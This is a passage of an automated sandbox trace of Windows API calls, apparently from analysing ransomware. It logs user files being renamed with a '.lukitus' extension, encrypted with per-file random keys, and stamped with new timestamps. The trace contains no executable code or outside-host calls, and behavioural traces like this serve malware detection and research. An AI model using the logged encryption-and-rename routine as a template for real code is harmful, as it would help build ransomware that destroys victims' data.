lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x172b6, lpOverlapped=0x0) returned 1 [0107.365] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.365] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64046810, dwHighDateTime=0x1d31760)) [0107.365] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.365] FlushFileBuffers (hFile=0x324) returned 1 [0107.368] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\czmBJ.docx" (normalized: "c:\\users\\aetadzjz\\documents\\czmbj.docx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103da7a0, ftCreationTime.dwHighDateTime=0x1d29628, ftLastAccessTime.dwLowDateTime=0x6fe3e860, ftLastAccessTime.dwHighDateTime=0x1d2a9a9, ftLastWriteTime.dwLowDateTime=0x6fe3e860, ftLastWriteTime.dwHighDateTime=0x1d2a9a9, nFileSizeHigh=0x0, nFileSizeLow=0x87aa)) returned 1 [0107.368] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.368] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.368] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.368] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.368] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.368] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.368] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.368] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.369] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.369] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\czmBJ.docx" (normalized: "c:\\users\\aetadzjz\\documents\\czmbj.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.369] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\czmBJ.docx" (normalized: "c:\\users\\aetadzjz\\documents\\czmbj.docx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-D49BF973-E058168B454F.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-d49bf973-e058168b454f.lukitus"), dwFlags=0x9) returned 1 [0107.376] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.376] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.381] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x87aa, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x87aa, lpOverlapped=0x0) returned 1 [0107.382] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.382] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x87aa, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x87aa, lpOverlapped=0x0) returned 1 [0107.382] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.383] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6406c970, dwHighDateTime=0x1d31760)) [0107.383] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.383] FlushFileBuffers (hFile=0x324) returned 1 [0107.386] GetFileAttributesExW (in: lpFileName="c:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9dc29440, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0x9dc29440, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0x9dc4f5a0, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x77)) returned 1 [0107.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.387] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.387] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.387] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.387] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.387] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.387] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.387] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.387] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.387] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.387] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.387] CreateFileW (lpFileName="c:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0107.387] GetLastError () returned 0x5 [0107.387] RaiseException (dwExceptionCode=0xe06d7363, dwExceptionFlags=0x1, nNumberOfArguments=0x3, lpArguments=0x281f558) [0107.388] GetLastError () returned 0x5 [0107.388] SetLastError (dwErrCode=0x5) [0107.388] RtlUnwind (TargetFrame=0x281fcac, TargetIp=0x40148b, ExceptionRecord=0x281f028, ReturnValue=0x0) [0107.388] GetLastError () returned 0x5 [0107.388] SetLastError (dwErrCode=0x5) [0107.388] GetLastError () returned 0x5 [0107.388] SetLastError (dwErrCode=0x5) [0107.388] GetLastError () returned 0x5 [0107.388] SetLastError (dwErrCode=0x5) [0107.388] GetLastError () returned 0x5 [0107.388] SetLastError (dwErrCode=0x5) [0107.388] GetLastError () returned 0x5 [0107.388] SetLastError (dwErrCode=0x5) [0107.388] GetLastError () returned 0x5 [0107.388] SetLastError (dwErrCode=0x5) [0107.388] GetLastError () returned 0x5 [0107.388] SetLastError (dwErrCode=0x5) [0107.388] GetLastError () returned 0x5 [0107.388] SetLastError (dwErrCode=0x5) [0107.388] GetLastError () returned 0x5 [0107.388] SetLastError (dwErrCode=0x5) [0107.388] GetLastError () returned 0x5 [0107.388] SetLastError (dwErrCode=0x5) [0107.388] GetLastError () returned 0x5 [0107.388] SetLastError (dwErrCode=0x5) [0107.388] GetLastError () returned 0x5 [0107.388] SetLastError (dwErrCode=0x5) [0107.388] GetLastError () returned 0x5 [0107.388] SetLastError (dwErrCode=0x5) [0107.388] GetLastError () returned 0x5 [0107.388] SetLastError (dwErrCode=0x5) [0107.388] CreateFileW (lpFileName="c:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x324 [0107.388] CreateFileW (lpFileName="c:\\ProgramData\\Sun\\Java\\Java Update\\F56924BE-9663-41BB-0FD4E971-761D2214F09F.lukitus" (normalized: "c:\\programdata\\sun\\java\\java update\\f56924be-9663-41bb-0fd4e971-761d2214f09f.lukitus"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x328 [0107.389] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.389] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.394] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x77, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x77, lpOverlapped=0x0) returned 1 [0107.394] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x77, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x77, lpOverlapped=0x0) returned 1 [0107.395] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.395] FlushFileBuffers (hFile=0x328) returned 1 [0107.398] CreateFileW (lpFileName="c:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0107.398] GetLastError () returned 0x5 [0107.398] RaiseException (dwExceptionCode=0xe06d7363, dwExceptionFlags=0x1, nNumberOfArguments=0x3, lpArguments=0x281f468) [0107.398] GetLastError () returned 0x5 [0107.398] SetLastError (dwErrCode=0x5) [0107.398] RtlUnwind (TargetFrame=0x281f584, TargetIp=0x40148b, ExceptionRecord=0x281ef38, ReturnValue=0x0) [0107.398] GetLastError () returned 0x5 [0107.398] SetLastError (dwErrCode=0x5) [0107.398] GetLastError () returned 0x5 [0107.398] SetLastError (dwErrCode=0x5) [0107.398] GetLastError () returned 0x5 [0107.398] SetLastError (dwErrCode=0x5) [0107.398] GetLastError () returned 0x5 [0107.398] SetLastError (dwErrCode=0x5) [0107.398] GetLastError () returned 0x5 [0107.398] SetLastError (dwErrCode=0x5) [0107.398] GetLastError () returned 0x5 [0107.399] SetLastError (dwErrCode=0x5) [0107.399] GetLastError () returned 0x5 [0107.399] SetLastError (dwErrCode=0x5) [0107.399] GetLastError () returned 0x5 [0107.399] SetLastError (dwErrCode=0x5) [0107.399] GetLastError () returned 0x5 [0107.399] SetLastError (dwErrCode=0x5) [0107.399] GetLastError () returned 0x5 [0107.399] SetLastError (dwErrCode=0x5) [0107.399] GetLastError () returned 0x5 [0107.399] SetLastError (dwErrCode=0x5) [0107.399] GetLastError () returned 0x5 [0107.399] SetLastError (dwErrCode=0x5) [0107.399] GetLastError () returned 0x5 [0107.399] SetLastError (dwErrCode=0x5) [0107.399] GetLastError () returned 0x5 [0107.399] SetLastError (dwErrCode=0x5) [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0107.399] MoveFileExW (lpExistingFileName="c:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml"), lpNewFileName="c:\\ProgramData\\Sun\\Java\\Java Update\\72B0CBD499699DC37CF7F45B885A2C21.tmp" (normalized: "c:\\programdata\\sun\\java\\java update\\72b0cbd499699dc37cf7f45b885a2c21.tmp"), dwFlags=0x8) returned 0 [0107.400] DeleteFileW (lpFileName="c:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml")) returned 0 [0107.400] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\2hVBnJTXBLe0.csv" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\2hvbnjtxble0.csv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x868d4200, ftCreationTime.dwHighDateTime=0x1d2fafd, ftLastAccessTime.dwLowDateTime=0xebed17a0, ftLastAccessTime.dwHighDateTime=0x1d2fbb2, ftLastWriteTime.dwLowDateTime=0xebed17a0, ftLastWriteTime.dwHighDateTime=0x1d2fbb2, nFileSizeHigh=0x0, nFileSizeLow=0x3d32)) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.400] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\2hVBnJTXBLe0.csv" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\2hvbnjtxble0.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.400] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\2hVBnJTXBLe0.csv" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\2hvbnjtxble0.csv"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\F56924BE-9663-41BB-13F942E8-48EB76E84F48.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\f56924be-9663-41bb-13f942e8-48eb76e84f48.lukitus"), dwFlags=0x9) returned 1 [0107.402] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.402] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.407] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x3d32, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x3d32, lpOverlapped=0x0) returned 1 [0107.407] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.407] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x3d32, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x3d32, lpOverlapped=0x0) returned 1 [0107.408] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.408] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x640b8c30, dwHighDateTime=0x1d31760)) [0107.408] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.408] FlushFileBuffers (hFile=0x328) returned 1 [0107.411] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\8KgurcPGpDs5t.csv" (normalized: "c:\\users\\aetadzjz\\desktop\\8kgurcpgpds5t.csv"), fInfoLevelId=0x0, 